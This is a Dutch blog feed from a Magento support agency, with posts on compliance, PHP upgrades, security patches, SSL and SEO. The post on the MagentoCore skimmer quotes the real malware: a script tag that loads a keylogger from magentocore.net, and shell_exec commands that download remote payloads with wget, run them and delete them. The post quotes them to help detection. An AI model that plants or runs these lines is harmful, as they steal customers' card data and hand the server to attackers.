    De ACM houdt in Nederland toezicht op de naleving van de geoblocking verordening. De toezichthouder mag een boete van 9 ton per overtreding opleggen, maar zover hoeft het niet alijtd te komen.  “We hebben meer instrumenten dan alleen boetes en kiezen wat het meest effectief is” aldus een woordvoerder van het ACM.

    Heb je een Magento shop die verschillende prijzen hanteert voor verschillende landen of kunnen klanten uit bepaalde lidstaten niet bij jou shoppen? Je doet er verstandig aan om na te lopen of je webwinkel wel conform de nieuwe verordening opereert.

  • Ruim 7000 klachten over de AVG en mogelijk onderzoek naar overtredingen

    ap logo-200x200Sinds 25 mei 2018, de dag dat de nieuwe privacy wet van kracht ging, zijn er ruim 7.000 klachten binnengekomen bij de Autoriteit Persoonsgegevens (AP). Ook zijn de vragen over de AVG / GDPR toegenomen. Ruim 10.000 keer werd de vragenlijn geraadpleegd door consumenten en organisaties die meer wilde weten over de nieuwe regels.


    De nieuwe Europese privacywet, de Algemene Verordening Persoonsgegevens (AVG), is op 25 van kracht gegaan. Deze wet beschrijft hoe organisaties in Europa met persoonsgegevens moeten omgaan. De organisatie die de naleving van de AVG controleert is de Autoriteit Persoonsgegevens (AP).

    De nieuwe privacywet heeft veel verantwoordelijkheden neergelegd bij de organisaties. Dit betekende in veel gevallen dat veel technische en juridische aanpassingen gedaan moesten worden om zo de AVG te kunnen naleven. Gezien de wet ook vrij omvangrijk is, er nog veel vragen en onduidelijkheden waren, maar 25 mei 2018 toch als harde deadline stond is het misschien ook niet zo gek dat er 7.000 klachten zijn binnengekomen.

    AP heeft gemeld bezig te zijn de klachten te analyseren. Er wordt gekeken of er bepaalde klachten en knelpunten zijn die vaker naar voren komen. Deze knelpunten kunnen vervolgens worden meegenomen in de eerste officiële evaluatie van de AVG, die in januari zal plaatsvinden.

    Naar aanleiding van de klachten heeft het AP ook een onderzoek ingesteld naar mogelijke overtredingen. Een grote toevoeging aan de nieuwe privacywet is de hoogte van de boetes die kunnen worden uitgedeeld. Een woordvoerder van het AP stelde dat dit echter niet altijd zover hoeft te komen.

    Heb jij je webshop al helemaal AVG proof? Je kunt in deze blog alles lezen over AVG en wat dit voor jouw webshop inhoudt. Toch nog vragen? Neem gerust contact met ons op.

     

  • PHP 7.2 Support Patches voor Magento 1

    PHP 7.2 Magento upgradeMagento heeft onlangs nieuwe patches uitgebracht die ondersteuning bieden voor PHP 7.2.x voor Magento Commerce 1.14.2.x & 1.1.4.3 en Magento Open Source 1.9.2.x & 1.9.3.x.
    Magento heeft ook bekend gemaakt deze patches te integreren in Magento Commerce 1.14.4.0 en Magento Open Sourc 1.9.4.0, welke voor eind 2018 op de agenda staan.

    Waarom overgaan op PHP 7.2

    Draait jouw Magento shop nog op PHP 5.x, dan zijn er een aantal voordelen te behalen met het overstappen naar PHP 7.2:

    1. PHP7 is sneller

    • PHP 7 is snel. Heel snel. Door de nieuwe PHP Next Generation Engine worden PHP requests veel sneller verwerkt. Afhankelijk of je FPC gebruikt kan PHP 7 tot wel 3x zo snel werken als PHP 5. Dit maakt je Magento shop dus veel sneller.

    2. PHP 7 gebruikt minder geheugen

    • De manier hoe PHP 7 omgaat met het geheugen is grotendeels de sleutel voor de gigantische snelheidsverbeteringen. We zullen je de technische uitleg besparen maar het komt er op neer dat PHP7 bijna 50% minder geheugen gebruikt bij het uitvoeren van scripts. Dit maakt je Magento shop niet alleen een stuk sneller, maar er kunnen ook meer bezoekers tegelijkertijd je shop bezoeken.

    3. Verbeterde foutafhandeling

    • PHP 7 biedt ook een verbeterde foutafhandeling, super handig voor developers en het kan veel tijd besparen bij het programmeren.
    • 4. PHP 5.6 stopt met support per 1 januari 2019.

      • Nog een kleine 2 maanden en dan stopt de laatste versie van PHP 5, PHP 5.6, met security support van deze versie. Dit betekent dat je Magento 1 shop vanaf dat moment steeds kwetsbaarder wordt voor kwaadwillende. Lees meer over de verschillen en voordelen van PHP 5.x vs PHP 7.x in deze blog.

      Ook voor Magento shops die op PHP 7.0 draaien geldt de beperkte ‘houdbaarheidsdatum’ van security support. Per 3 december 2018, dus nog maar één maand, zullen er ook geen security updates meer uitkomen voor deze versie. PHP 7.1 zal nog security support genieten tot december 2019.

      Naast performance verbeteringen is het dus, voor Magento 1 shops die op PHP 5 of PHP7.0 draaien, ook het behoud en continuering van een veilige PHP versie.

      Hoe moet ik upgraden naar PHP 7.2?

      Wanneer je overstapt naar een nieuwe PHP omgeving is het mogelijk dat een aantal oude onderdelen van je webshop het niet meer doen. Dit komt vaak doordat sommige functies niet meer (goed) werken in een nieuwere PHP versie. Dit wil je natuurlijk testen alvorens je de nieuwe PHP versie live zet. Wil je zelf upgraden naar PHP 7.2, ga dan als volgt te werk:

      1. Zet een testomgeving op

      • Dit kun je onder andere doen middels het opzetten van een development Hypernode. Indien je dit lokaal wilt doen kun je ook een tool als Vagrant gebruiken.

      2. Zet Git versiebeheer op

      • Als een wijziging niet klopt kun je dit makkelijk terugdraaien.

      3. Installeer de PHP upgrade
      4. Code check

      • Je kunt op meerdere manieren testen of alles compatibel is met PHP 7.2. Inchoo heeft hier een goede extensie voor, maar ook Byte heeft eigen test-tool ontwikkeld.

      5. Patch de incompatibel code

      • Patch de code die uit de scan als ‘incompatibel’ komt.

      6. Upgrade naar PHP 7.2

      Van PHP 5.6 en PHP 7.0 naar PHP 7.2

      Het ligt eraan welke modules er draaien op je webshop, maar een upgrade van PHP 7.0 naar PHP 7.2 zal over het algemeen weinig implicaties met zich meebrengen. Tussen PHP 5.6 en PHP 7.2 zitten grotere verschillen en kan het dus zijn dat er meer aanpassingen in modules moeten worden gedaan.

      Wij helpen u graag met het upgraden van uw Magento shop naar PHP 7.2. Wij maken altijd eerst een uitgebreide scan om de impact van de upgrade voor u in kaart te brengen, met een bijbehorende ureninschatting. Zo komt u nooit voor verrassingen te staan. Upgraden naar PHP 7.2? Neem contact met ons op via ons aanmeldformulier.

  • Zeroday-lekken in Magento

    Magento zeroday-lekkenVia verschillende zeroday-lekken in Magento-extensies kunnen cybercriminelen Magento webwinkels hacken. De hackers kunnen via deze lekken code in de extensies injecteren om zo creditcardgegevens van klanten te bemachtigen. Meerdere Magento webshops (ticketmaster, Newegg, British Airways) zijn in het nieuws gekomen nadat er creditcardskimmers op betaalpagina’s waren aangetroffen die creditcardgegevens van hun klanten verzamelden.

     


    Wat houdt de Magento Zeroday-lek precies in?

    Bij de betreffende modules maken de hackers gebruik van een specifieke PHP-functie om zo hun eigen stukje PHP-code in de website te injecteren. Het betreft de PHP-functie unserialize<> . Met toegang tot deze functies kan een hacker de database en/of JavaScript-bestanden aanpassen en zo de website van een creditcardskimmer voorzien.

    Magento heeft onderhand veel van deze kwetsbare PHP-fucnties in hun eigen code vervangen, maar dit geldt niet voor de extensies. Uit onderzoek is gebleken dat de hackers tal van PHP Object Injection-kwetsbaarheden (Zeroday-lekken) in veel extensies hebben gevonden en Magentoshop hier actief op scannen. Hoewel Magento dus maatregelen heeft getroffen tegen de zeroday-lekken, zijn veel Magento shops via hun extensies dus nog steeds kwetsbaar voor hackers.

    Willem de Groot, een beveiligingsonderzoeker actief in de Magento community, heeft 20 kwetsbare modules in kaart gebracht. De lijst met kwetsbare modules kunt u hier vinden. Wij raden alle Magento webwinkels aan de betreffende modules meteen uit te schakelen en de logbestanden te controleren op ongeautoriseerde activiteiten.

    Wat moet ik doen om de Zeroday-lekken tegen te gaan

    Wij raden onze klanten aan de volgende stappen te ondernemen:

    • Update Magento
      • Magento heeft in hun laatste patch de meeste kwetsbare code vervangen. De PHP-functie unserialize() is vervangen door json_decode().
    • Check modules
      • Gebruik jij een van de modules van de lijst van Willem de Groot? Schakel deze dan meteen uit en controleer de logbestanden op activiteiten
    • Scan je shop in Magereport
      • MageReport heeft hun securityscan ook een update gegeven en scant nu ook naar Zeroday-kwetsbaarheden in meerdere modules.

    Hulp nodig met een Security Scan op Magento zeroday-lekken?

    Heeft vragen over de Zeroday-lekken of hulp nodig met uw Magento shop patchen, modules nalopen op PHP unserialize() functies en het controleren van ongeautoriseerde activiteiten? Wij helpen u hier graag mee. Neem contact met ons op via ons aanmeldformulier.

  • Magento 2.2.6 and 2.1.15 Security Update

    magento patchOp 10 september heeft Magento een nieuwe Security update vrijgegeven voor Magento 2.2.6 en 2.1.15. Deze Magento update dicht 24 beveiligingsproblemen en richt zich vooral op het beveiligen tegen Cross-Site Scripting (XSS). Maar ook veel andere beveiligingslekken zijn gedicht. We raden u aan om uw Magento shop naar deze nieuwste versie te upgraden. Naast verbeteringen in de beveiliging bevat deze patch ook een aantal verbeteringen de Magento core. Hieronder het overzicht:

    Magento 2.2.6 en 2.1.15 verbeteringen

    • Substantial improvements to performance
      • Category product indexer logic has been optimized, and re-indexing time has decreased up to 98%, from 40 minutes to one minute for 100,000 categories
      • The catalog:image:resize command execution time has been reduced by up to 90% in the release
      • The catalog rule re-indexing operation has been optimized, and the average re-indexing time has improved by more than 80%
      • The catalog price indexer is now scoped and multithreaded, which improves the performance of layered navigation, search, and indexing actions for Magento instances with multiple websites and stores
      • The time required to load category or product pages for products that are configured with many attributes (more than 500) has been significantly reduced
      • The time required to load a store’s home page has been reduced noticeably when the top menu contains many categories.
      • Merchants can now improve store performance by disabling Magento Report functionality.
    • Improvements to the reliability and ease of the checkout process
      • A shopping cart’s contents remain constant even when the checkout page is repeatedly reloaded
      • Refreshing the checkout page no longer deletes the shipping address when a guest checks out
      • The speed at which Magento places an order is no longer affected by how many shipping methods are available
    • Additional enhancements
      •  Configurable products are now sorted by visible prices as expected.
      • Magento no longer sends duplicate delete requests as a result of an unstable Internet connection

    De Magento 2.2.6 en 2.1.15 Security updates

    • APPSEC-2003: RCE via Varnish settings in admin
    • APPSEC-2045: PHP Files Can Be Uploaded Via Custom Options
    • APPSEC-2081: Magento is leaking customer address attribute data.
    • APPSEC-2027: Multiple CSRF (Website, Store, Store View deletion)
    • APPSEC-2092: CSRF on Changing of orders status
    • APPSEC-2006: Admin Stored XSS via Enterprise Logging
    • APPSEC-2059: CSRF Mass Deletion of Customers
    • APPSEC-2058: CSRF Mass Deletion of Products
    • APPSEC-2037: Local file disclosure
    • APPSEC-2033: XSS When Viewing Catalog Product Link Widget Via Product Name
    • APPSEC-2031: XSS When Viewing Email Reminder Rule via Cart Price Rule Name
    • APPSEC-1904: Stored Cross Site Scripting in Category Content
    • APPSEC-2032: XSS When Viewing Catalog Category Link Widget Via Category Name
    • APPSEC-2047: Customer orders viewable on frontend by other customers
    • APPSEC-2106: Product Video feature not GDPR compliant
    • APPSEC-2011: Stored Cross-Site Scirpting (Product Video Uploader Name)
    • APPSEC-1902: Stored Cross Site Scripting in Product Content Short Description
    • APPSEC-1903: Stored Cross Site Scripting in Product Content Description
    • APPSEC-1909: Admin account takeover via File upload information disclosure
    • APPSEC-1950: Encrypted data is cached in decrypted form
    • APPSEC-1859: Reset password URL includes the customer ID
    • APPSEC-2002: E-mail admin users when a new administrator is created
    • APPSEC-1902: Stored Cross Site Scripting in Product Content Short Description

    Wat moet ik doen om Magento Security issues te bestrijden?

    Gebruik altijd de laatste versie van Magento Open Source (2.2.6) of Magento Commerce (2.1.15) om zo de nieuwste verbeteringen, features en beveiligingsupdates te krijgen.
    Wij helpen u graag hiermee. Mail ons via het supportaanvraagformulier of bel ons op 020-3375906

  • Magento Commerce 1.14.3.10 en Magento (OS) 1.9.3.10 Security Patch: SUPEE-10888

    magento patchOp 10 september heeft Magento een nieuwe Security Patch uitgebracht voor Magento Commerce 1.14.3.10 en Open Source 1.9.3.10. De Security Patch, SUPEE-10888, bevat meerdere beveiligingsverbeteringen die Cross-site Scripting (XSS), Cross-site request forgery (CSRF) en een tal van andere beveiligingslekken dicht.

     

     

     

    Magento Commerce 1.14.3.10 en Open Source 1.9.3.10 Security fixes

    • APPSEC-2061: Authenticated Unauthorised Data Access Via Layout Injection
    • APPSEC-1971: Reflective XSS against Admin Panel
    • APPSEC-2067: Admin to Admin XSS in configurable custom attribute label
    • APPSEC-2066: Admin to Admin XSS in Catalog Attribute Media Label
    • APPSEC-2060: Overwrite all Reviews
    • APPSEC-1859: Reset password URL includes the customer ID
    • APPSEC-1730: Downloader does not force to use HTTPS
    • APPSEC-1936: Customer password recoverable from the database
    • APPSEC-1933: Moxieplayer Redirect
    • APPSEC-2002: E-mail admin users when a new administrator is created.
    • APPSEC-1790: Possibility to inject XML via gift card registry

    Wat moet ik doen om Magento Security issues te bestrijden?


    Gebruik altijd de laatste versie van Magento Open Source (1.9.3.10) of Magento Commerce (1.14.3.10) om zo de nieuwste beveiligingsupdates te krijgen.
    Wij helpen u graag hiermee. Mail ons via het supportaanvraagformulier of bel ons op 020-3375906

  • Magento-skimmer infecteert 400 Magento webshops in Nederland en duizenden in het buitenland

    MagentoCore skimmerÉén groep hackers is verantwoordelijk voor het infecteren van meer dan 7000 Magento webshops, verspreid over de hele wereld. De MagentoCore skimmer, het stuk software dat hiervoor gebruikt wordt, is hiermee de meest succesvolle (en daarmee ook meest gevreesde) tot nu toe. De getroffen websites betreffen kleine Magento shops maar ook grote multinationals.

    De 7339 Magento shops zijn allemaal geïnfecteerd in de afgelopen 6 maanden. Veel daarvan hadden dit binnen enkele weken door, maar bijna 1500 shops hebben de ‘parasiet’ voor bijna de volledige 6 maanden in de Magento core genesteld gehad. En de groep is nog niet klaar! Sterker nog, het tempo is omhoog gegaan. Uit onderzoek gebleken dat de groep in de afgelopen 2 weken 50 tot 60 nieuwe shops per dag infecteert. Op dit tempo zouden ze in theorie de komende 6 maanden nog eens 10.000 webshops kunnen infecteren.

    Wat doet de MagentoCore skimmer?

    De MagentoCore skimmer krijgt toegang tot de backend door (onder andere) gebruik te maken van een brute-force aanvallen (automatisch verschillende wachtwoorden proberen, soms wel voor maanden lang). Eenmaal het juiste wachtwoord, dan worden er een stukjes code op de website geplaatst en dan begint alle ellendigheid.
    Een stukje javascript wordt geplaatst in de HTML template:

    • <script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>

    Dit script registreert wat de klant op zijn toetsenbord intypt en stuurt dit real-time naar de “Magentocore.net” server, die ergens in Moskou staat.
    Het heeft zelfs een eigen backup systeem door gebruik te maken van cron.php. Hiermee download het script periodiek virussen, voert het uit en daarna verwijderd het zichzelf weer, zodat er sporen worden achtergelaten. Dit ziet er als volgt uit:

    • shell_exec("wget -c https://magentocore.net/clean.json -O ./app/code/core/clean.php 2>&1");
    • shell_exec("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");
    • shell_exec("php ./app/code/core/clean.php 2>&1");
    • shell_exec("php ./app/code/core/clear.php 2>&1");
    • unlink('./app/code/core/clean.php');
    • unlink('./app/code/core/clear.php');

    Advies van SupportDesk

    Wij raden alle Magento webshopeigenaren hun developer te laten checken of er in de broncode onbekende <scripts> worden geladen. SupportDesk heeft veel ervaring op het gebied van Magento security. Denkt u dat uw shop is geïnfecteerd of heeft u hulp nodig met een scan op dit uit te sluiten? Neem gerust vrijblijvend contact op met een van onze Magento security experts.

  • Magento stopt support voor Magento 1 en Magento 2.1

    Magento 1 end of lifeAl sinds de komst van Magento 2 in het najaar van 2015 is het support van Magento 1 een van de meest besproken onderwerpen in Magento land. 3 jaar lang hing er de prangende vraag: wanneer stop Magento met support voor deze versie?. Vanaf vandaag hoeven we niet meer te speculeren, want de datum is bekend: Juni 2020 stop Magento met support voor Magento 1.

     

    Einde support voor Magento 1 en Magento 2.1

    Het einde van het support geldt zowel voor Magento Commerce als Magento Open Source. Tot Juni 2020 zullen er alleen nog security patches worden uitgebracht. Voor Magento 1 Commerce zullen daarnaast ook nog quality patches worden doorgevoerd. Ook voor de oude versies van Magento 2 zal in de toekomst support uitblijven. Voor Magento 2.1, die in juni 2016 ter beschikking kwam, zal het support in juni 2019 stoppen. Voor Magento 2.2 is deze datum gezet op september 2019. Over Magento 2.3, een versie die nog moet uitkomen en waar erg naar uitgekeken wordt door de Magento community, heeft Magento nog geen uitspraken gedaan.

     

    Impact voor Magento 1 sites

    Wat betekent geen support voor jouw Magento shop? beveiligingspatches houden Magento webshops veilig en compliant. De patches zorgen ervoor dat jouw webshop optimaal blijft presteren en zo goed mogelijk beveiligd blijft. Na juni 2019 zal dit dus niet meer geval zijn en kunnen Magento 1 shops ten prooi vallen voor kwaadwillende. Voor Magento 1 webshopeigenaren is het nu dus van belang om op korte termijn een beslissing te nemen. Een migratie naar Magento 2 kost namelijk tijd.

  • Alles over SSL (TLS) voor jouw Magento webshop

    SSLVoor een webshop is het van levensbelang dat jouw klanten veilig kunnen winkelen. Een beveiligde verbinding tussen de klant en jouw webshop is hiervoor essentieel. Daarmee laat je zien dat je de gegevens en privacy van je klant belangrijk vind, en bouw je het vertrouwen op met de klant zodat hij jou uiteindelijk de koop gunt.

     

    Om dit goed in te richten loop je echter al snel tegen termen als HTTPS, (full) SSL, TLS, certificaten en CDN aan. In deze blog leggen wij je uit wat deze termen nou precies betekenen, wat een certificaat is en hoe je deze aanvraagt en configureert op jouw Magento shop.

     

    Wat is HTTPS, SSL en TLS?

    HTTPS staat voor ‘HyperText Transfer Protocol Secure’ en is de veilige variant van HTTP. Het is het protocol voor communicatie tussen een webclient (de browser die de klant gebruikt) en een webserver (waar jouw Magento shop op draait). De laatste letter, de “S” (Secure), verschijnt in de URL wanneer een website is beveiligd met een SSL (TLS) certificaat.

    Secure Sockets Layer (SSL)

    Secure Sockets Layer (SSL) is een techniek waarmee de verbinding tussen de bezoeker van een website en de server waar de website is ondergebracht wordt beveiligd middels encryptie. Vaak wordt er gedacht dat SSL alleen nodig is als een bezoeker gegevens verstuurt via de website, maar SSL doet veel meer! SSL zorgt dat kwaadwillende niet kunnen meelezen met wat de bezoeker naar jouw website verstuurt. Maar het voorkomt ook dat informatie die naar de website verstuurd wordt, of vanaf jouw Magento shop verzonden wordt, aangepast kan worden.

    Transport Layer Security (TLS)

    Transport Layer Security (TLS) is een verbeterde en veiligere versie van SSL. Omdat SSL echter nog steeds de meest gebruikte term is zie je TLS maar weinig voorbij komen. Maar wanneer je een SSL certificaat aanschaft, koopt je in werkelijkheid een TLS certificaat zodat je van de best beveiligde optie gebruikt maakt.
    Met HTTPS en SSL (TLS) ben je dus zeker van:

    • Encryptie
      • De gegevens tussen de server (waar jouw webshop op draait) en je bezoekers worden versleuteld verzonden. Kwaadwillende kunnen niet met bezoekers meekijken of informatie stelen terwijl deze de webshop bezoeken;.
    • Data integriteit
      • De gegevens die heen en weer gestuurd worden tussen de server en bezoekers kunnen onderweg niet veranderd worden zonder dat het gemerkt wordt;.
    • Authenticatie
      • Klanten weten zeker dat ze jouw website bezoeken. Er kan geen partij tussenkomen die de klant stiekem naar een andere website leidt.

    Veiligheid voor de gebruikers staat bij Google hoog in het vaandel en Google pusht daarom sinds medio 2014 al websites om SSL (TLS) te gebruiken. Sinds 2017 heeft het ontbreken ervan ook serieuze impact op de SEO en geven veel browsers ook een pop-up met “dit is geen veilige site”. Een veilige SSL -verbinding is dus echt een must.

    Waar kan ik een SSL (TLS) certificaat krijgen?

    Voor een SSL certificaat kun je kiezen voor een Certificate Authority(CA). Deze bedrijven beloven alleen certificaten uit te geven aan gevalideerde eigenaren van domeinen. Doordat de CA vertrouwd is, kun je de klant van de CA ook vertrouwen. Enkele merken van SSL certificaten zijn RapidSSL, AlphaSSL, GeoTrust en Thawte. SSL certificaten verkrijg je meestal tegen betaling. Je hebt echter ook een gratis SSL certificaat. Hiervoor kun je Let’s Encrypt gebruiken. Het opzetten hiervan is echter wel voor de gevorderde gebruiker en kan alleen worden gebruikt voor Domain Validation (we leggen verderop het verschil tussen de verschillende validatie types uit). Voor het managen van certificaten voor ontwikkelomgevingen is Let’s Encrypt ideaal, omdat de bijgeleverde tools het mogelijk maken de certificaten automatisch te laten verlengen.

    Waar moet je op letten bij het configureren van een SSL (TLS) certificaat?

    HTTPS of full HTTPS?
    Full HTTPS, ook wel full SSL genoemd, will zeggen dat alle pagina’s van jouw webshop HTTPS zijn (bijvoorbeeld, i.p.v. alleen de check-out pagina). Het betekent ook dat alle resources binnen een pagina (extern ingeladen fonts, de afbeeldingen, etc) via SSL worden ingeladen. Dit biedt meerdere voordelen:

    • 1. Je houdt Google te vriend. HTTP pagina’s worden immers steeds slechter gewaardeerd door de grote zoekmachine. Op SEO gebied is dat dus zeker aan te raden. Je kunt er meer over lezen in de blog van Google.
    • 2. Het stelt je in staat HTTP2 aan te bieden. HTTP2 stelt de browser in staat om meerdere resources (css, js) tegelijk te laden over 1 verbinding, i.p.v. voor ieder bestand een aparte verbinding op te zetten. Dit komt de performance (snelheid) van jouw Magento shop ten goede, wat weer beter is voor de SEO en gebruiksvriendelijkheid.
    • 3. Voor alle pagina’s op jouw webshop gelden de voordelen van SSL (TLS); Encryptie, data integriteit en authenticatie.
    • 4. Er loopt geen data meer over HTTP. Dit betekent dat jouw klanten geen waarschuwingen van hun browser kunnen krijgen (zoals hieronder). Een killer voor het vertrouwen in een webshop.


    waarschuwing als SSL ontbreekt

    Verschillende validatie niveaus

    SSL (TLS) voorziet in meerdere niveaus waarop de aanvrager van een certificaat geverifieerd wordt, en dit vertaalt zich in uitgebreidere vertrouwenssymbolen in de browser.

    Domein validatie (DV)
    De simpelste vorm van validatie waarbij alleen gekeken wordt of de aanvrager in het bezit is van het domein waarvoor de aanvraag wordt gedaan. Wij raden deze vorm af voor webshops.

    Organisatie validatie (OV)
    OV certificaten wekken meer vertrouwen doordat de organisatie meegegeven wordt bij de aanvraag, en die wordt op een basis manier geverifieerd. Daardoor wordt de organisatie (bedrijfsnaam) ook weergegeven als informatie over het SSL certificaat wordt opgevraagd. De organisatie naam wordt echter niet pro-actief in de browserbalk meegegeven. Dit is een goede certificaat vorm voor beginnende en kleinere webshops.

    Extended Validation (EV) certificaten

    Extended Validation (EV) certificaten doen er nog een schepje bovenop om de gebruiker te overtuigen dat men op een veilige website surft. EV certificaten eisen namelijk meer dan alleen het kunnen aantonen van eigenaarschap van een domeinnaam. Zo worden onder andere ook de KvK gegevens gecontroleerd van de webshop. In de adresbalk krijg je dan naast het bekende groene slotje ook jouw bedrijfsnaam erbij. Wij raden deze certificaten aan voor de grotere webshops.

    Extended Validation EV Certificaten in browser


    SSL (TLS) op de server

    Het is belangrijk dat de configuratie van de SSL verbinding op de server goed is ingesteld. Heb je een managed server, dan zal de hoster dit voor je bijhouden. Beheer je de server zelf, dan zal je dit zelf moeten doen.

    Naast het configureren van de SSL op de server is het ook verstandig de server zelf up to date te houden. Oudere SSL pakketten kunnen kwetsbaar zijn voor bijvoorbeeld, Heartbleed, een ernstig lek in een veel gebruikt SSL pakket.

    Tot slot wil je verifiëren of de SSL instellingen goed geconfigureerd zijn, want door een verkeerde configuratie kunnen oude en/of zwakke sleutels nog steeds toegestaan zijn wat inbreuk mogelijk maakt. Dit moet ook regelmatig, bijvoorbeeld jaarlijks, gecontroleerd worden aangezien hackers steeds slimmer worden en noodgedwongen de SSL standaard zich verder ontwikklen. Zo staat TLS 1.3 voor de deur, dat weer veiliger maar ook sneller is. SSL labs is een goede tool om te controleren of de SSL omgeving correct geconfigureerd is. Ideaal gezien scoor je daar met je website A+.

    SSL (TLS) op CDN

    Veel webshops maken gebruik van een Content Delivery Network (CDN). Een CDN als Cloudflare biedt de optie om een eigen certificaat te installeren, of deze te laten genereren. Let hierbij wel op dat het certificaat zowel bij de CDN als de server in gebruik moet zijn, zodat het verkeer tussen klant, CDN en server volledig versleuteld kan verlopen.
    Tot slot
    SSL is dus een must voor elke Magento webshop. Maar komt veel bij kijken om dit op de juiste manier te configureren, om zo veiligheid te bieden en SEO te behouden.
    Bij het installeren van een SSL certificaat wil je dus letten op:

    • 1. Ga voor Full HTTPS zodat pagina’s van jouw Magento shop zijn beveiligd
    • 2. Extended Certification (EV) certificaten geven nog meer vertrouwen aan jouw klanten
    • 3. Gebruik SSL Labs om te checken of jouw SSL certificaat goed is ingesteld op de server
    • 4. Zorg dat je SSL certificaat geldig is
    • 5. Houd je server up to date
    • 7. Bij het gebruiken van een CDN, zorg er dan voor dat het certificaat zowel bij de CDN als de Server in gebruik is.
    • 8. Redirects. Laat de webserver (Apache/nginx) redirecten en niet Magento zelf voor een beter SEO behoud.

    Heb je hulp nodig bij het aanvragen of opzetten van jouw SSL certificaat? Of wil je zeker weten dat er in het Magento CMS en templates geen broken SSL’s zijn en dat alle redirects goed geconfigureerd staan? SupportDesk helpt je hier graag mee. Neem vrijblijven contact met ons op voor meer informatie.

  • reCaptcha en Two-Factor Authentication voor Magento 2 Open Source

    reCaptcha en Two-Factor Authentication voor Magento 2 Open SourceAfgelopen week heeft Magento laten weten Google reCAPTCHA en Two-Factor Authentication (2FA) te hebben toegevoegd aan Magento Open Source (OS) 2.1 en alle hogere versies. Deze modules bieden veel extra beveiliging bij het inloggen en het verminderen van spam.

     

    Two-Factor Autehntication (2FA)

    Two-Factor authentication (2FA), ook wel twee-staps verificatie genoemd, maakt het inloggen voor jou en/of je klanten een stuk veiliger ten opzichte van inloggen met alleen een wachtwoord. Two-Factor Authentication maakt accounts een stuk veiliger omdat een extra code nodig is om in te loggen. Naast een username en wachtwoord heb je dan ook een verificatiecode nodig, wat een grote bescherming biedt tegen ongeautoriseerde inlogpogingen.

     

    Google reCAPTCHA

    Google reCAPTCHA

     

     

     

     

     

    CAPTCHA, dat staat voor Completely Automated Public Turing test to tell Computers and Humans Apart, is ontwikkeld om mensen van bots te kunnen onderscheiden op het internet. Je wist dat een website dit gebruikte op het moment dat je een website bezocht en een paar cijfers of woorden moest overtikken, om zo te bewijzen dat je geen robot was. Bots werden echter ook slimmer en begonnen dit te herkennen. Toen is Google met reCAPTCHA op de proppen gekomen, welke nog beter in staat is om mensen van bots te kunnen onderscheiden. Google reCAPTCHA biedt ten opzichte van Magento CAPTCHA de volgende voordelen:

    • 1. Geavanceerde beveiligingsmaatregelen om bots uit je Magento Admin of shop te houden
    • 2. Ondersteuning voor onzichtbare reCAPTCHA
    • 3. Gebruiksvriendelijker

    Installeren van Google reCAPTCHA en Two-Factor Authentication

    In de Magento Open Source User Guide staat meer gedetailleerde informatie over de reCAPTCHA en Two-Factor Authentication modules en hoe deze geïnstalleerd kunnen worden.

    Magento Open Source 2.1.x

    Magento Open Source 2.2.x

    Magento Security gaat natuurlijk veel verder dan reCAPTCHA en 2FA. Kijk voor meer informatie eens op onze Magento Security pagina of neem contact op met een van onze medewerkers.

    Heeft u toch hulp nodig met het installeren en implementeren van Google reCAPTCHA en Two-Factor Authentication in uw Magento 2 shop? SupportDesk helpt u hier graag mee.

  • Google stapt over naar Mobile-first indexing

    Mobile First IndexingGoogle gooit het roer om! Waar eerst je desktopwebsite bepaalde hoe hoog je mobiele website in de zoekresultaten van Google verscheen, wordt dit met mobile-first indexing nu helemaal omgedraaid. Maar wat is mobile-first indexing nou precies en hoe bereid je jouw Magento shop hier op voor?

    Wat is mobile-first indexing?

    Google gebruikte voorheen desktop-first indexing. Dit betekende dat Google de desktopversie van een website crawlde en indexeerde voor zoekresultaten. Wat jij dus ziet na een zoekopdracht, of je nou met een desktop of mobiel zoekt, is gebaseerd op de performance van de desktop variant. Mobile-first indexing draait dit principe om. De performance en content van de mobiele versie wordt nu gebruikt bij het tonen van zoekresultaten in Google.

    Waarom mobile-first indexing?

    Het doel van mobile-first indexing is, volgens Google “..to better help our -primarily mobile – users find what they’re looking for”.
    ‘Primarily mobile users’. In 2016 zijn er voor het eerst meer zoekopdrachten in Google gedaan met een mobiel dan desktop. De verhoudingen blijven verder uit elkaar gaan en verwacht wordt dat einde dit jaar 75% van de zoekopdrachten via mobiel zal gaan. Op bijna alle vlakken blijft het mobiel gebruik toenemen en het desktop gebruik overstijgen. Leer er hier meer over.

    ‘To better help’. De reden dat mobiele pagina’s nu gebruikt worden voor indexatie komt door het -mogelijke- verschil tussen de mobiele- en desktopvariant. Sommige websites tonen andere content, ingekort of afgebroken, aan mobiele zoekers. Dit terwijl de relevantie werd bepaald door de desktopversie. Een pagina die minder of andere content toont is wellicht minder relevant voor bepaalde zoekopdrachten. Dit kan resulteren in een mismatch tussen gewenste en gevonden content en dus een minder goede gebruikerservaring van de machtige Google-zoekmachine. Dat liet Google natuurlijk niet gebeuren.

    Mobile Responsive

    Simpel gezegd passen responsive websites zich aan aan het scherm waar de gebruiker een website mee bezoekt. Of het nou een laptop, tablet of smartphone is, er is slechts één website. Één website waarvan de layout zich aanpast aan de resolutie van het beeldscherm van de gebruiker. Dit betekent dat de content van de pagina’s, wat dus een heel belangrijk onderdeel voor je ranking, niet verschilt als een bezoeker de website bezoekt met zijn smartphone of desktop. De google bots zullen dus dezelfde content zien, wat dus goed is voor mobile first indexing. Zoals het ernaar uitziet is Mobile responsive ‘the way to go’ voor Magento shops.

    4 (technische) tips voor een Mobile responsive Magento shop

    Tip 1. CDN. Probeer je Content Delivery Network (CDN) zo dicht mogelijk bij de gebruiker te zetten. Hoe dichter bij de gebruiker, hoe sneller de pagina zal laden voor de gebruiker.

    Tip 2. Caching. Zorg ervoor dat al je assets op een efficiënte manier cashbaar zijn. Zorg dat je niet per pagina een CSS file hebt maar één generieke CSS file en maak die zo efficiënt mogelijk.

    Tip 3. Lean and mean. Met een CDN en efficiënte cashing kom je al een heel eind, maar een foto van 200 MB blijft een hoop om te laden. Als het niet nodig is, gebruik het dan ook niet. Een foto op het juiste formaat is beter dan moeten terugschalen. Ditzelfde geldt ook voor de javascripts.

